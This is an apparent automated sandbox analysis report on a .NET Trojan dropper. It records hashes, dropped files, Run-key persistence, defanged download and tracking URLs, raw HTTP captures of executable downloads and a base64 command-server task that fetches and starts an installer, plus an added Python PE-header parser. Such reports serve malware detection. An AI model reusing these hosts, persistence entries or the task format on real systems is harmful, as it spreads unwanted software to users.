Gen.Variant.Barys.51615_5a27ccdd7f
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Barys.51615 (B) (Emsisoft), Gen:Variant.Barys.51615 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 5a27ccdd7f913de15e3e50055a89bed0
SHA1: c76f750007218c9f293e9516df3a8920168af4af
SHA256: a9b3e67620d1562355932030a0a15ef180f2db6c44da6556392424e496a317a2
SSDeep: 3072:plf679qfx9slPmwJty58LIxlsgmBemG5CFCJIpiHleu/L8DMKp1pPA:X679qp9Mry504s95FyXHQ0TK3
Size: 261120 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-24 04:07:07
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3360
Sho9libi.exe:3352
SecondL.exe:2304
OneTwo.exe:2324
The Trojan injects its code into the following process(es):
%original file name%.exe:3496
mt2nc53t201.exe:3588
9HE87PWAK.exe:2628
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
Reading note: the security.config.cch.new and enterprisesec.config.cch.new files under C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG and under the per-user "CLR Security Config" folder, together with the deleted security.config.cch.<pid>.<n> temporaries (PIDs 3352 and 2324 are those of Sho9libi.exe and OneTwo.exe), are the .NET 2.0 runtime's code-access-security policy cache, which is rewritten whenever a managed executable starts. They appear because the dropped files are .NET assemblies; they are not payloads. The files that matter are those written under %Temp%\243GKURU6R, %AppData%\Roaming\ewu301kb1f3, %Program Files%\9HE87PWAKQ and C:\config.conf.
The process %original file name%.exe:3496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe (7856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe (146738 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\SecondL.exe (208 bytes)
The process Sho9libi.exe:3352 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (1404 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (1404 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3352.366851 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3352.366851 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3352.366851 (0 bytes)
The process SecondL.exe:2304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
The process OneTwo.exe:2324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\9HE87PWAKQ\9HE87PWAK.exe.config (1 bytes)
%Program Files%\9HE87PWAKQ\9HE87PWAK.exe (53713 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\9HE87PWAKQ\uninstaller.exe (19389 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\9HE87PWAKQ\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2324.363310 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2324.363310 (0 bytes)
The process 9HE87PWAK.exe:2628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\9HE87PWAKQ\cast.config (37 bytes)
Registry activity
Reading note: the HKLM\SOFTWARE\Microsoft\Tracing\<image name>_RASAPI32 and _RASMANCS keys, with tracing disabled and a 1 MiB file cap, are created by the Windows RAS tracing facility the first time a process loads the RAS/WinINet networking stack; one pair per image is a side effect of each dropped binary going online, not configuration the malware writes. The Internet Settings\ZoneMap changes (AutoDetect=1, UNCAsIntranet=0, ProxyBypass and IntranetName removed) are likewise what WinINet applies when it initialises zone settings in a fresh profile. The persistence-relevant entries are the RunOnce and Run values below.
The process %original file name%.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
To run again at the next logon (once only, since this is a RunOnce key), the Trojan registers its file in the following system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_HA00P" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:3360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process Sho9libi.exe:3352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
The process SecondL.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process mt2nc53t201.exe:3588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To run itself each time the user logs on, the Trojan registers its file in the following registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"lb5nwgevyag" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe"
The process OneTwo.exe:2324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 9HE87PWAK.exe:2628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"ConsoleTracingMask" = "4294901760"
To run itself each time the user logs on, the Trojan registers its file in the following registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"34Y2QEO0XU7NPC7" = "%Program Files%\9HE87PWAKQ\9HE87PWAK.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 6203e55fd157282662fc6aea23e5cb70 | c:\Program Files\9HE87PWAKQ\9HE87PWAK.exe |
| fdd3424eccf62d09ea5bf9ee27b9417b | c:\Program Files\9HE87PWAKQ\uninstaller.exe |
| 01d524aa409195160b923be02d634be7 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe |
| f9b3e3b6df9d735c87d97f163640526a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\SecondL.exe |
| bfc7eb837ad2a9903a4e61d28c684ae1 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe |
| e0638234fb697f2c4ff961fee8f702f6 | c:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: 0M3XWT
Product Name: 0M3XWT
Product Version: 8.3.1.0
Legal Copyright: Copyright (c) 5990
Legal Trademarks:
Original Filename: JijiLaPute.exe
Internal Name: JijiLaPute.exe
File Version: 8.3.1.0
File Description: 0M3XWTB
Comments: 0M3
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 47116 | 47616 | 4.28771 | 21cc7a868e0a2c112bbb916a2a0a6b87 |
| .rsrc | 57344 | 212216 | 212480 | 3.83739 | 21542cc044b5bf776dfc9f764723e4e9 |
| .reloc | 270336 | 12 | 512 | 0.056519 | ba012dcb17de38ea49624f5f14992194 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://www.wizzmonetize.com/remotes_xml_sections.php | |
| hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe | |
| hxxp://bratitlamio.com/3/000000/wizzcaster_installer_v2.exe | |
| hxxp://bratitlamio.com/exe/updater.exe | |
| hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe | |
| hxxp://bratitlamio.com/download/3/wizzcaster_v2.exe | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://bratitlamio.com/download/3/wizzcaster_uninstaller_v2.exe | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://www.wizzmonetize.com/api/v5/config | |
| hxxp://www.wizzmonetize.com/api/v5/link | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://ladomainadeserver.com/api/v5/config | |
| hxxp://ladomainadeserver.com/api/v5/link | |
| dns.msftncsi.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:02 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=g6km0oaep4njvfc6ntmvsj1871; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"message":"Track was added"}
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:02 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=a1iv6fekvp9ioc6qj17oiiief5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8

{"message":"Track was added"}
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:05 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=d1b9b20e3b89c3225db6a37e5b5323e4ac9e3175; expires=Thu, 31-Aug-2017 20:18:05 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"time_between_prints":"15"}
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:05 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=a53c3d52b3b1a6259a24972804ebd40a489d37db; expires=Thu, 31-Aug-2017 20:18:05 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8

{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}
GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:17:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2a00
[chunk body: MZ/PE32 image, Machine 0x14C (i386), sections .text/.rsrc/.reloc, followed by the "BSJB" .NET metadata signature with runtime version string "v2.0.50727", i.e. a managed .NET 2.0 executable; remainder of dump skipped]
GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:17:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

39000
[chunk body: MZ/PE32 image, Machine 0x14C (i386), sections .text/.rsrc/.reloc, followed by the "BSJB" .NET metadata signature with runtime version string "v2.0.50727", i.e. a managed .NET 2.0 executable; remainder of dump skipped]
GET /exe/updater.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:17:57 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

241c00
[chunk body: MZ/PE32 image, Machine 0x14C (i386), sections .text/.rsrc/.reloc, followed by the "BSJB" .NET metadata signature with runtime version string "v2.0.50727", i.e. a managed .NET 2.0 executable; remainder of dump skipped]
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

12e200
[chunk body: MZ/PE32 image, Machine 0x14C (i386), sections .text/.rsrc/.reloc, followed by the "BSJB" .NET metadata signature with runtime version string "v2.0.50727", i.e. a managed .NET 2.0 executable; remainder of dump skipped]
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:01 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

7dc00
[chunk body: MZ/PE32 image, Machine 0x14C (i386), sections .text/.rsrc/.reloc, followed by the "BSJB" .NET metadata signature with runtime version string "v2.0.50727", i.e. a managed .NET 2.0 executable; remainder of dump skipped]
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2000
[chunk body: MZ/PE32 image, Machine 0x14C (i386), sections .text/.rsrc/.reloc, followed by the "BSJB" .NET metadata signature with runtime version string "v2.0.50727", i.e. a managed .NET 2.0 executable; remainder of dump skipped]
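The six downloads above are truncated in the capture, but their first bytes already identify them: each body starts with a chunked-transfer size line, then an MZ/PE header whose Machine field is 0x14C, and the "BSJB" metadata signature with the "v2.0.50727" runtime string follows. The Python below is an added example (not part of the Lavasoft report and not code from the samples) that makes the same determination from the headers alone, by reading the CLR data directory rather than searching for "BSJB": a stripper for the chunked framing, a PE header parser, and a constructed minimal PE32 image used as sample input. The sample's timestamp is the report's "Created at" value, assumed here to be a PE TimeDateStamp; nothing else in it is taken from the captured files.

```python
import struct
from datetime import datetime, timezone


def first_chunk(body: bytes) -> bytes:
    """Strip the chunked-transfer framing seen in the captures: a hex size line
    (e.g. 2a00) terminated by CRLF, then that many raw bytes."""
    size_line, sep, rest = body.partition(b"\r\n")
    if not sep:
        raise ValueError("no chunk-size line")
    size = int(size_line.split(b";")[0].strip(), 16)   # ignore chunk extensions
    return rest[:size]


def pe_info(data: bytes):
    """Read the DOS, COFF and optional headers of a PE image and report machine,
    section count, link timestamp and whether the CLR (COM descriptor) data
    directory is populated, which is what makes a file a .NET assembly.
    Returns None for anything that is not a PE image.  Only headers are read,
    so a truncated download like the dumps above is enough."""
    try:
        if data[:2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        machine, nsections, tstamp, _, _, opt_size, _ = struct.unpack_from(
            "<HHIIIHH", data, e_lfanew + 4)
        opt = e_lfanew + 24                       # start of the optional header
        magic = struct.unpack_from("<H", data, opt)[0]
        if magic == 0x10B:                        # PE32
            ndirs_off, dirs_off = 92, 96
        elif magic == 0x20B:                      # PE32+
            ndirs_off, dirs_off = 108, 112
        else:
            return None
        ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]
        clr_rva = clr_size = 0
        if ndirs > 14 and opt_size >= dirs_off + 15 * 8:
            clr_rva, clr_size = struct.unpack_from("<II", data, opt + dirs_off + 14 * 8)
    except struct.error:
        return None                               # header cut off
    return {
        "machine": machine,
        "sections": nsections,
        "compiled": datetime.fromtimestamp(tstamp, tz=timezone.utc),
        "is_dotnet": clr_size != 0,
        "clr_rva": clr_rva,
    }


def analyse_download(body: bytes):
    """Chunked HTTP body -> PE summary (or None)."""
    return pe_info(first_chunk(body))


def build_sample(clr_size: int, timestamp: int = 1503547627) -> bytes:
    """Construct a minimal header-only PE32 image for demonstration.  This is
    NOT one of the downloaded files; the default timestamp is the report's
    'Created at' value (2017-08-24 04:07:07 UTC), assumed to be a TimeDateStamp."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    coff = struct.pack("<HHIIIHH", 0x014C, 3, timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008 if clr_size else 0, clr_size)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    body = b"178\r\n" + build_sample(72) + b"\r\n0\r\n\r\n"   # 0x178 = 376 bytes
    print(analyse_download(body))
```

Run against a real capture, feed `first_chunk()` the bytes after the blank line that ends the response headers; a non-zero CLR directory size confirms a managed assembly, and the timestamp gives the build time that a sandbox usually reports as "Created at". Managed assemblies built for AnyCPU still carry Machine 0x14C, so the machine field alone does not distinguish them from native x86 code.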
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:17:29 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=024e2i2k6818d1e0k8b29500t1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1608
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA4MzEiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDgzMSIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
